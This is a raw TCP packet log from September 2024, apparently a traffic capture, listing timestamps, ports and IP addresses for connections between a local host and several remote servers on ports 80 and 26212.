Sep 3, 2024 17:13:15.013689995 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.013704062 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.013704062 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.013715029 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.013721943 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.013746977 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.013777971 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.014113903 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014128923 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014142036 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014157057 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014163017 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.014173985 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014183044 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.014189005 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014203072 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014214993 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.014215946 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014230967 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.014233112 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014255047 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.014281988 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.014472008 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014486074 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014497042 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014511108 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014524937 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.014539003 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.014576912 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015330076 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015347004 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015360117 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015382051 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015389919 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015396118 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015398979 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015410900 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015420914 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015425920 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015440941 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015451908 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015486002 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015495062 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015902996 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015917063 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015929937 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015944004 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.015999079 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015999079 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.015999079 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.016170025 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016184092 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016197920 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016217947 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016251087 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.016263962 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.016819000 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016834974 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016850948 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016863108 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016877890 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016889095 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.016892910 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016908884 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016921997 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.016928911 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.016947985 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.016957045 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.018393993 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.018462896 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.021420956 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.108736038 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.108793974 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.108854055 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.123615026 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.162626982 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:15.165708065 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.165730000 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.165745974 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.165774107 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.165806055 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.166717052 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.166734934 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.166754961 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.166776896 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.166794062 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.166812897 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.166829109 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.166855097 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.166877985 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.166897058 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.166908979 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.166999102 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167016983 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167028904 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167042971 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167063951 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167114019 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167238951 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167251110 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167268038 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167292118 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167402029 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167428017 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167517900 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167530060 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167548895 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167562962 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167577028 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167592049 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167599916 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167603970 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167622089 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167629957 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167639017 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167651892 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167659998 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167674065 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167680979 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167702913 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167704105 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.167764902 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167792082 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167805910 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167819977 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167831898 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167835951 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167865038 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167875051 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.167959929 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167978048 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.167998075 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168004036 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168015003 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168024063 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168044090 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168076992 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168267012 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168294907 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168308973 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168337107 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168365955 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168382883 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168396950 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168410063 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168426991 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168435097 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168524981 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168536901 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168546915 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168577909 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168601990 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168845892 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168859005 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168869972 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168884993 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168900013 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168932915 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168937922 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.168946028 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168960094 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168968916 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.168999910 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.169009924 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.177994013 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178035975 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178051949 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178064108 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.178103924 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.178153992 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178169012 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178220034 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.178637028 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178653955 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178694963 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.178708076 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.178736925 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178781033 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.178853035 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178867102 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178879976 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.178889036 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.178913116 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.178921938 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.179265022 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179296017 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179308891 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179361105 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.179403067 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179452896 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.179790974 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179825068 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179842949 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179856062 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.179874897 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.179936886 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179951906 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179968119 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.179975986 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.180007935 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.180254936 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180268049 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180279970 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180299044 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.180315018 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.180614948 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180795908 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180816889 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180831909 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180845976 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180882931 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.180896997 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.180932999 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180948019 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180962086 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.180975914 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.181000948 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.181030989 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.181081057 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.181124926 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.181888103 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.181942940 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.182002068 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.182174921 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.207166910 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.207257032 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.207390070 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:15.207434893 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:15.351829052 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.376718044 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:15.381716013 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.514307976 CEST	80	49725	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:15.515497923 CEST	49725	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:15.525500059 CEST	49725	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:15.530404091 CEST	80	49725	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:15.564436913 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.570789099 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:15.575706959 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.759268999 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.763011932 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:15.768003941 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.788800001 CEST	80	49725	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:15.788911104 CEST	49725	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:15.793891907 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:15.798855066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:15.798927069 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:15.799118042 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:15.803944111 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:15.904855967 CEST	49725	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:15.905302048 CEST	49727	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:15.910046101 CEST	80	49725	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:15.910135984 CEST	49725	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:15.910366058 CEST	80	49727	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:15.910442114 CEST	49727	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:15.910586119 CEST	49727	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:15.915682077 CEST	80	49727	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:15.951843023 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.957020998 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:15.961965084 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.961975098 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.961983919 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.962126970 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.962136984 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:15.962146044 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:16.092036009 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:16.092354059 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:16.098083973 CEST	80	49723	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:16.098131895 CEST	49723	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:16.099349022 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:16.099534035 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:16.099689007 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:16.104619980 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:16.229213953 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:16.233819008 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:16.238852024 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:16.421829939 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:16.522593021 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:16.527535915 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:16.643819094 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:16.643872023 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:16.648137093 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:16.653000116 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:16.716029882 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:16.724441051 CEST	80	49727	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:16.724554062 CEST	49727	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:16.730302095 CEST	49727	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:16.735523939 CEST	80	49727	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:16.827619076 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.066745996 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:17.066781044 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.066811085 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:17.066814899 CEST	80	49727	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:17.066843987 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.066876888 CEST	49727	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:17.068459988 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:17.068731070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:17.069766998 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.069822073 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.070080996 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.070132017 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.070677996 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.070709944 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.070720911 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.070729017 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.070729971 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.070764065 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.070786953 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.070920944 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071005106 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.071034908 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071085930 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.071109056 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071154118 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.071249962 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071259022 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071299076 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.071327925 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071393967 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.071651936 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071661949 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071706057 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.071717978 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071751118 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.071764946 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.071798086 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.072611094 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.072663069 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.073606968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:17.073726892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:17.073832989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:17.073865891 CEST	80	49712	52.212.52.84	192.168.2.8
